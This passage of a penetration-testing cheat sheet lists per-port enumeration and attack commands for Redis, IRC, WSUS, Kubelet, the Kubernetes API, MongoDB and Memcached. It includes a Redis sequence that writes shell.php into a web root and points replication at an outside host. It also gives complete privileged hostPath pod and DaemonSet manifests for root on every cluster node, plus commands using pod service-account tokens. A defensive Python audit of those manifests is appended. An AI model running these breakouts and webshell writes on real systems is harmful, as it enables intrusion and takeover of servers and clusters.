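# REPLICAOF to an outside host (the key value is a placeholder, not a payload).
SAMPLE = b"".join([encode("INFO"),
                   encode("CONFIG", "SET", "dir", "/var/www/html"),
                   encode("CONFIG", "SET", "dbfilename", "shell.php"),
                   encode("SET", "test", "<placeholder>"),
                   encode("SAVE"),
                   encode("REPLICAOF", "203.0.113.5", "6379")])
```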
redis-cli
| Action |
Command |
| Get Redis info / test if authentication is required |
INFO |
| Login with credentials |
AUTH <password>
AUTH <username> <password> |
| Get configuration file contents |
CONFIG GET * |
| Show connected clients |
CLIENT LIST |
| Show keys |
KEYS * |
| Get keys from database |
SELECT <db_number_from_#Keyspace_in_INFO>
KEYS *
GET <key> |
nmap (NSE)
| Action |
Command |
| Enumerate server info |
nmap -p 6379 --script redis-info <ip> |
| Brute-force AUTH |
nmap -p 6379 --script redis-brute <ip> |
6667 TCP – IRC
- Internet Relay Chat (plaintext).
hexchat
- GUI IRC client.
nmap
| Action |
Command |
| Enumerate server/version |
nmap -sV -p 6667 --script irc-info <ip> |
nc
| Action |
Command |
| Connect (plaintext) |
nc -v <ip> 6667 |
6697 TCP – IRC (TLS/SSL)
- IRC over TLS/SSL (encrypted).
hexchat
- GUI IRC client; enable SSL/TLS for the server entry.
openssl
| Action |
Command |
| TLS connect (test cert/handshake) |
openssl s_client -connect <ip>:6697 -servername <host> |
nmap
| Action |
Command |
| Enumerate server/version |
nmap -sV -p 6697 --script irc-info <ip> |
8530 TCP - Windows Server Update Services / WSUS (HTTP)
- Vulnerable to CVE-2025-59287
8531 TCP - Windows Server Update Services / WSUS (HTTPS)
10250 TCP - Kubelet
kubeletctl
| Action |
Command |
| View running pods |
kubeletctl -s <node ip> pods |
| Get a shell on a pod |
kubeletctl exec /bin/sh -p <pod name> -n <namespace> -c <container name> -s <node ip> |
8443 TCP - Kubernetes API
kubectl
| Action |
Command |
| Run a command |
kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 <command> |
| Get list of pods |
kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 get pods |
| List permissions |
kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 auth can-i --list |
- Token and ca.crt come from the service account directory inside the pod: /run/secrets/kubernetes.io/serviceaccount
- Token must be exported to an environment variable for it to work (unconfirmed)
- If the account has permission to create pods, create one with the host file system mounted inside (see https://raesene.github.io/blog/2019/04/01/The-most-pointless-kubernetes-command-ever/)
noderoot.yml:
apiVersion: v1
kind: Pod
metadata:
  name: noderootpod
  labels:
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: noderootpod
    image: busybox  # or another valid known image, i.e. pick one from another pre-existing pod
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
- Create the pod: kubectl create -f noderoot.yml
- Get a shell on the node through the pod: kubectl exec -it noderootpod -- chroot /host
- If unable to exec into the new pod using kubectl, try kubeletctl to access it
- In order to gain root on all nodes in a cluster, use a DaemonSet instead:
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: noderootpod
  labels:
spec:
  selector:
    matchLabels:
      name: noderootdaemon
  template:
    metadata:
      labels:
        name: noderootdaemon
    spec:
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: noderootpod
        image: busybox  # or another valid known image, i.e. pick one from another pre-existing pod
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: noderoot
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "while true; do sleep 30; done;" ]
      volumes:
      - name: noderoot
        hostPath:
          path: /
- Get a shell on a node through one of the DaemonSet pods: kubectl exec -it <chosen pod from "kubectl get po" output> -- chroot /host
- If unable to exec into the new pod using kubectl, try kubeletctl to access it
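The admission-side view of the noderootpod manifests above, as an added example that is neither from the original notes nor from the linked blog post: an audit that flags the settings both manifests rely on (host namespaces, a hostPath "/" volume, a privileged container, a control-plane toleration), which is what Pod Security Admission's "baseline" level rejects. The manifests are embedded as Python dicts, trimmed to the fields that matter for admission, because the standard library has no YAML parser.

```python
# Manifests embedded as dicts (the standard library has no YAML parser);
# trimmed to the fields that matter for admission.
NODEROOT_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "noderootpod"},
    "spec": {
        "hostNetwork": True, "hostPID": True, "hostIPC": True,
        "containers": [{"name": "noderootpod", "image": "busybox",
                        "securityContext": {"privileged": True},
                        "volumeMounts": [{"mountPath": "/host", "name": "noderoot"}]}],
        "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
    },
}
# Same pod template wrapped in the DaemonSet variant from the notes
NODEROOT_DAEMONSET = {
    "apiVersion": "apps/v1", "kind": "DaemonSet", "metadata": {"name": "noderootpod"},
    "spec": {"selector": {"matchLabels": {"name": "noderootdaemon"}},
             "template": {"metadata": {"labels": {"name": "noderootdaemon"}},
                          "spec": dict(NODEROOT_POD["spec"], tolerations=[
                              {"key": "node-role.kubernetes.io/master",
                               "effect": "NoSchedule"}])}},
}

def pod_spec(manifest):
    """PodSpec of a bare Pod, or of the pod template inside a workload."""
    spec = manifest["spec"]
    return spec["template"]["spec"] if "template" in spec else spec

def audit(manifest):
    """Return findings; an empty list means none of these breakout settings is present."""
    spec, findings = pod_spec(manifest), []
    for key in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(key):
            findings.append("%s: true (shares the node's namespace)" % key)
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:        # "/" mounted at /host is what chroot /host needs
            findings.append("volume %s is hostPath %s" % (vol["name"], vol["hostPath"].get("path")))
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append("container %s runs privileged" % c["name"])
    for t in spec.get("tolerations", []):
        if t.get("key", "").startswith("node-role.kubernetes.io/"):
            findings.append("tolerates %s (lands on control-plane nodes too)" % t["key"])
    return findings
```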
27017 TCP – MongoDB
Commands
| Action |
Command |
| Connect to DB |
mongo -u <username> -p <password> <database> |
| Show collections |
show collections |
| Search for objects in a collection |
db.<collection>.find() |
| Add object to collection |
db.tasks.insert({"cmd":"<bash command>"}) |
11211 TCP – Memcached
- In-memory cache that sits in front of the database of database-backed websites to speed them up.
nc
| Action |
Command |
| Connect |
nc -v <ip> 11211 |
telnet
| Action |
Command |
| Connect |
telnet <ip> 11211 |
Commands
| Action |
Command |
| Get version |
version |
| Get status |
stats |
| Get slabs |
stats slabs |
| Retrieve items list / slab items info |
stats items |
| Dump cached items from a slab (0 = unlimited lines) |
stats cachedump <slab_id> 0 |
Tip: stats items shows lines like STAT items:<#>:age ...; use that <#> as <slab_id> in stats cachedump.